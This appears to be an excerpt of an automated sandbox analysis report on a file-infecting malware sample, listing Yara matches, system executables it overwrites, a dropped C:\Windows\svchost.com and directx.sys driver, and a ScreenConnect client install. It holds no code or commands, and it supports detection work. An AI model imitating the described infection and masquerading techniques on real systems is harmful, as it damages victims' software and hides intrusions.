                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPED
                          Source: Yara match | File source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPED
                          Source: Yara match | File source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPED
                          Source: Yara match | File source: C:\Windows\svchost.com, type: DROPPED
                          Source: Yara match | File source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
                          Source: Yara match | File source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
                          Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPED
                          Source: Yara match | File source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPED
                          Source: Yara match | File source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                          Source: Yara match | File source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe, type: DROPPED
                          Infects executable files (exe, dll, sys, html)
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE
                          Source: C:\Users\user\Desktop\$RUX313H.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to behavior
Sample is not signed and drops a device driver
Source: C:\Windows\svchost.com | File created: C:\Windows\directx.sys
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe | Executable created and started: C:\Windows\svchost.com
Drops PE files with a suspicious file extension
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Windows\svchost.com
Drops executable to a common third party application directory
Source: C:\Users\user\Desktop\$RUX313H.exe | File written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Client.dll
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
